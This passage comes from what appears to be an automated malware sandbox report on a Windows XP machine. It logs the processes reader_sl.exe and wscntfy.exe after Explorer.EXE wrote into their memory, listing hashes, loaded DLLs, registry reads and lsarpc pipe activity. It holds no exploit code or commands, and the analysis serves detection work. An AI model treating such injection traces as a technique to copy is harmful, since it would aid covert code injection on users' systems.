[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File System Control Communication:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File: [ PIPE\lsarpc ], Control Code: [ 0x0011C017 ], 4 times
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Memory Mapped Files:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ C:\WINDOWS\system32\SENS.DLL ]
File Name: [ C:\WINDOWS\system32\stdole2.tlb ]
[#############################################################################]
8. reader_sl.exe
[#############################################################################]
[=============================================================================]
General information about this executable
[=============================================================================]
Analysis Reason: Explorer.EXE wrote to the virtual memory of this process
Filename: reader_sl.exe
MD5: 54c88bfbd055621e2306534f445c0c8d
SHA-1: 960a171e826c077187fe634103874644327a6110
File Size: 40048 Bytes
Command Line: "C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe"
Process-status
at analysis end: alive
Exit Code: 0
[=============================================================================]
Load-time Dlls
[=============================================================================]
Module Name: [ C:\WINDOWS\system32\ntdll.dll ], Base Address: [0x7C900000 ], Size: [0x000AF000 ]
Module Name: [ C:\WINDOWS\system32\kernel32.dll ], Base Address: [0x7C800000 ], Size: [0x000F6000 ]
Module Name: [ C:\WINDOWS\system32\USER32.dll ], Base Address: [0x7E410000 ], Size: [0x00091000 ]
Module Name: [ C:\WINDOWS\system32\GDI32.dll ], Base Address: [0x77F10000 ], Size: [0x00049000 ]
Module Name: [ C:\WINDOWS\system32\ADVAPI32.dll ], Base Address: [0x77DD0000 ], Size: [0x0009B000 ]
Module Name: [ C:\WINDOWS\system32\RPCRT4.dll ], Base Address: [0x77E70000 ], Size: [0x00092000 ]
Module Name: [ C:\WINDOWS\system32\Secur32.dll ], Base Address: [0x77FE0000 ], Size: [0x00011000 ]
Module Name: [ C:\WINDOWS\system32\SHELL32.dll ], Base Address: [0x7C9C0000 ], Size: [0x00817000 ]
Module Name: [ C:\WINDOWS\system32\msvcrt.dll ], Base Address: [0x77C10000 ], Size: [0x00058000 ]
Module Name: [ C:\WINDOWS\system32\SHLWAPI.dll ], Base Address: [0x77F60000 ], Size: [0x00076000 ]
Module Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.1433_x-ww_5cf844d2\MSVCP80.dll ], Base Address: [0x7C420000 ], Size: [0x00087000 ]
Module Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.1433_x-ww_5cf844d2\MSVCR80.dll ], Base Address: [0x78130000 ], Size: [0x0009B000 ]
Module Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll ], Base Address: [0x773D0000 ], Size: [0x00103000 ]
Module Name: [ C:\WINDOWS\system32\comctl32.dll ], Base Address: [0x5D090000 ], Size: [0x0009A000 ]
Module Name: [ C:\WINDOWS\system32\MSCTF.dll ], Base Address: [0x74720000 ], Size: [0x0004C000 ]
[=============================================================================]
8.a) reader_sl.exe - Registry Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Registry Values Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Key: [ HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName ], Value Name: [ ComputerName ], Value: [ PC ], 1 time
[=============================================================================]
8.b) reader_sl.exe - File Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ PIPE\lsarpc ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Modified:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ PIPE\lsarpc ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File System Control Communication:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File: [ PIPE\lsarpc ], Control Code: [ 0x0011C017 ], 4 times
[#############################################################################]
9. wscntfy.exe
[#############################################################################]
[=============================================================================]
General information about this executable
[=============================================================================]
Analysis Reason: Explorer.EXE wrote to the virtual memory of this process
Filename: wscntfy.exe
MD5: f92e1076c42fcd6db3d72d8cfe9816d5
SHA-1: 549f0a01848375d03159fc74171ed97790fa9650
File Size: 13824 Bytes
Command Line: C:\WINDOWS\system32\wscntfy.exe
Process-status at analysis end: alive
Exit Code: 0
[=============================================================================]
Load-time Dlls
[=============================================================================]
Module Name: [ C:\WINDOWS\system32\ntdll.dll ], Base Address: [0x7C900000 ], Size: [0x000AF000 ]
Module Name: [ C:\WINDOWS\system32\kernel32.dll ], Base Address: [0x7C800000 ], Size: [0x000F6000 ]
Module Name: [ C:\WINDOWS\system32\msvcrt.dll ], Base Address: [0x77C10000 ], Size: [0x00058000 ]
Module Name: [ C:\WINDOWS\system32\USER32.dll ], Base Address: [0x7E410000 ], Size: [0x00091000 ]
Module Name: [ C:\WINDOWS\system32\GDI32.dll ], Base Address: [0x77F10000 ], Size: [0x00049000 ]
Module Name: [ C:\WINDOWS\system32\SHELL32.dll ], Base Address: [0x7C9C0000 ], Size: [0x00817000 ]
Module Name: [ C:\WINDOWS\system32\ADVAPI32.dll ], Base Address: [0x77DD0000 ], Size: [0x0009B000 ]
Module Name: [ C:\WINDOWS\system32\RPCRT4.dll ], Base Address: [0x77E70000 ], Size: [0x00092000 ]
Module Name: [ C:\WINDOWS\system32\Secur32.dll ], Base Address: [0x77FE0000 ], Size: [0x00011000 ]
Module Name: [ C:\WINDOWS\system32\SHLWAPI.dll ], Base Address: [0x77F60000 ], Size: [0x00076000 ]
Module Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll ], Base Address: [0x773D0000 ], Size: [0x00103000 ]
Module Name: [ C:\WINDOWS\system32\xpsp2res.dll ], Base Address: [0x007C0000 ], Size: [0x002C5000 ]
Module Name: [ C:\WINDOWS\system32\MSCTF.dll ], Base Address: [0x74720000 ], Size: [0x0004C000 ]
Module Name: [ C:\WINDOWS\system32\Apphelp.dll ], Base Address: [0x77B40000 ], Size: [0x00022000 ]
Module Name: [ C:\WINDOWS\system32\VERSION.dll ], Base Address: [0x77C00000 ], Size: [0x00008000 ]
[=============================================================================]
9.a) wscntfy.exe - Registry Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Registry Values Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Key: [ HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName ], Value Name: [ ComputerName ], Value: [ PC ], 1 time
[=============================================================================]
9.b) wscntfy.exe - File Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ PIPE\lsarpc ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Modified:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ PIPE\lsarpc ]
<